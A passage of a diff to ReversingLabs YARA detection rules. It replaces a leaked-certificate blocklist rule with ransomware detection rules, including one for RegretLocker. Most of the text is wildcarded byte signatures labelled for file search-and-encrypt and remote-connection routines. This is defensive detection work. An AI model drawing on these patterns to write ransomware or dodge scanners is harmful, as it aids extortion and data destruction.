+            6A ?? 50 FF D7 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E9 ?? ?? ?? ?? 8D 4C
+            24 ?? 51 50 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ??
+            ?? 89 5C 24 ?? 33 DB 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 54 24
+            ?? 89 4C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 8D 84 24
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 56 8D 84 24 ?? ?? ?? ?? 50 FF
+            D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 56 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ??
+            ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 6A ?? 59 33 C0 66 89 9C 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB 6A ?? FF
+            74 24 ?? 66 AB 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
+            ?? 57 53 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 0B 44 24 ?? 74 ?? 83 44
+            24 ?? ?? 11 5C 24 ?? EB ?? 89 7C 24 ?? 89 5C 24 ?? BF ?? ?? ?? ?? 57 E8 ?? ?? ?? ??
+            59 50 57 8B 7C 24 ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 47 ?? 8B 44 24 ?? 53
+            89 47 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 57 FF 74 24 ?? C7 47 ?? ?? ?? ?? ?? 88 5C 24
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? 3B FB 89
+            5C 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 8B 74 24 ?? 83 EE ??
+            1B FB 89 74 24 ?? 89 7C 24 ?? 89 5C 24 ?? 33 C0 EB ?? 8B 7C 24 ?? 8B 74 24 ?? 39 74
+            24 ?? 75 ?? 3B C7 75 ?? 8B 44 24 ?? 89 44 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74
+            24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 58 39 44 24 ?? 73 ?? 89 44 24 ?? 39 74 24
+            ?? 75 ?? 33 C0 3B C7 75 ?? 39 5C 24 ?? 7C ?? 7F ?? 83 7C 24 ?? ?? 76 ?? 8B 44 24 ??
+            83 E0 ?? 74 ?? 8B 4C 24 ?? 2B C8 03 C9 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 74 24 ??
+            53 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
+            ?? 50 81 EC ?? ?? ?? ?? 6A ?? 59 8B FC FF B4 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? FF
+            B4 24 ?? ?? ?? ?? F3 A5 8B B4 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ??
+            53 8D 44 24 ?? 50 FF 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 68 ?? ?? ?? ??
+            53 56 74 ?? FF 15 ?? ?? ?? ?? FF 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 33 C0 3B 44 24 ??
+            0F 8C ?? ?? ?? ?? 7F ?? 8B 4C 24 ?? 3B 4C 24 ?? 0F 82 ?? ?? ?? ?? EB ?? C6 44 24 ??
+            ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 74 24 ?? FF 15 ?? ?? ?? ??
+            FF 74 24 ?? 8B 3D ?? ?? ?? ?? FF D7 FF 74 24 ?? FF D7 56 8D 84 24 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 38 5C 24 ?? 8D 84 24
+            ?? ?? ?? ?? 75 ?? 6A ?? FF 74 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 FF 74 24 ?? 68 ?? ??
+            ?? ?? 75 ?? E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF D6 EB ?? E8 ?? ?? ?? ??
+            59 59 B0 ?? EB ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 32 C0 8B 8C 24 ?? ?? ?? ??
+            5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_2 = {
+            55 8D 6C 24 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ??
+            53 56 57 BE ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 56 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ??
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ??
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? 57
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ??
+            6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C3
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50
+            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 59 59 5F 5E 5B 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            59 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B 85 ??
+            ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 83 C5 ?? C9 C3
+        }
+		$remote_connection_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85
+            ?? ?? ?? ?? 50 8B F9 8B F2 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 33 DB 53 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 89 85 ?? ?? ?? ?? 66 C7 85
+            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
+            88 1F 50 88 1E 66 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 38 9D ?? ?? ??
+            ?? 59 59 75 ?? 68 ?? ?? ?? ?? C6 07 ?? E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 33 F6 BB ?? ?? ?? ??
+            56 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 53 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ??
+            46 83 FE ?? 59 59 7C ?? EB ?? 53 E8 ?? ?? ?? ?? 59 83 BD ?? ?? ?? ?? ?? 7C ?? C6 07
+            ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 F6 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 66
+            89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 50 FF
+            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 3B C6 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 89 B5 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 59 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B C8 85 C9
+            89 8D ?? ?? ?? ?? 7D ?? C6 07 ?? 51 E9 ?? ?? ?? ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 33 C0 8D BD ?? ?? ?? ?? 66
+            AB 40 3B C8 89 85 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 47 ?? E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 8B 77 ?? 2B 37
+            8D 46 ?? 50 E8 ?? ?? ?? ?? 59 56 6A ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 07 8B
+            8D ?? ?? ?? ?? 83 C4 ?? 03 C8 51 8B 4F ?? 2B C8 51 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 59 40 50 E8
+            ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? 8B F0 6A ?? 56 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? FF B5 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 56 53 C6 04 06 ??
+            E8 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
+            3B C6 59 59 0F 8C ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 83 F8 ?? 7E ?? 48 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 85 C0 59 59 75 ?? 8B 06 8B 8D ?? ?? ?? ?? 03
+            C8 51 8B 4E ?? 2B C8 51 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            83 C6 ?? FF 8D ?? ?? ?? ?? 75 ?? 33 F6 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ??
+            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 C7 ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 B0 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 50 53 C6
+            01 ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 59 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74
+            ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 53 C6 00 ?? E8 ?? ?? ??
+            ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 00 ?? EB ?? 0F
+            84 ?? ?? ?? ?? C6 07 ?? FF 15 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 83 BD ?? ?? ??
+            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 32 C0 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNINFO SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "37:0c:24:67:c4:1d:60:19:bb:ec:d7:2e:00:c5:d7:3d" and 1445299199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_and_encrypt_files and $remote_connection_1 and $remote_connection_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5067339614C5Cc219C489D40420F3Bf9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Regretlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects RegretLocker ransomware."
 		author = "ReversingLabs"
-		id = "6e0cb6f9-0a92-5eb2-b13f-f9c4eb0ae6b1"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c4e515cc-b0c2-57b2-a230-619ec01ac8d4"
+		date = "2021-04-02"
+		modified = "2021-04-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1834-L1850"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RegretLocker.yara#L1-L206"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1716087285a093a3467583f79d7ae9bee641997227e6d4f95047905aedcc97c6"
+		logic_hash = "3927dfecacd74f60a169f82b68df5747daa90eaba77f24c5e730ce4c48d426a3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RegretLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 8B 41 ?? 8B 55 ?? 3B C2 72 ?? 2B C2 56 8B 75 ?? 3B C6 0F 42 F0 83 79 ?? ??
+            72 ?? 8B 09 56 03 CA 51 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 5E 5D C2 ?? ?? E8 ??
+            ?? ?? ?? CC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 53
+            56 57 50 E8 ?? ?? ?? ?? 83 65 ?? ?? 50 E8 ?? ?? ?? ?? 83 4D ?? ?? 8A D8 59 59 8D 4D
+            ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ??
+            C7 45 ?? ?? ?? ?? ?? 8B CC 6A ?? 83 61 ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88
+            19 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8B 8D ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 6A ?? 5B 3B CB C6 45 ?? ?? 0F 43 C2 80 78 ??
+            ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ??
+            0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB
+            8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 84
+        }
+		$remote_connection_p2 = {
+            8D 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 84 C0 75 ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 3B FB 8D B5 ?? ?? ?? ?? 8B 9D
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F 43 C3 83 FF ?? 0F 43 F3 0F 43 D3 33 C9 8A 40 ?? 3A
+            46 ?? 0F BE 42 ?? 0F 94 C1 3B C8 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ??
+            ?? 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? ?? 74 ?? 32 DB EB ?? B3 ?? F6
+            45 ?? ?? 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5F 6A ?? 33 DB 89 BD
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? ?? ??
+            88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B B5 ?? ?? ?? ?? C6 45 ?? ?? 83 FE ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 84 C0 74 ?? 6A ?? 5E 83 EC ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ??
+            ?? ?? 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ??
+            89 59 ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+        }
+		$remote_connection_p3 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 83 EE ?? 75 ?? 8B B5 ?? ?? ?? ?? 8D 46 ?? 83 F8 ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 59 59 89 5D ?? 89 7D ?? 88 9D ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89
+            5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 8B
+            F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ??
+            ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ??
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45
+        }
+		$remote_connection_p4 = {
+            89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 8D 45 ?? 89 4D ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 6A
+            ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? C6 45
+            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 43 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 50 53 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 8B 75 ?? 0F 43 85 ?? ??
+            ?? ?? 6A ?? 6A ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 40 8D 8D ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? ?? ?? 59 53 FF 75 ?? 8D 8D ?? ?? ?? ?? A3 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 1C 01 E8 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 59 8B 75 ??
+            8D 4D ?? C6 45 ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? 89 70 ?? 8B 45 ??
+            89 30 8B 45 ?? 89 70 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 58 50 68 ?? ?? ?? ?? 83 EC ?? 89
+        }
+		$remote_connection_p5 = {
+            5D ?? 8B CC FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B F8 6A ?? 58
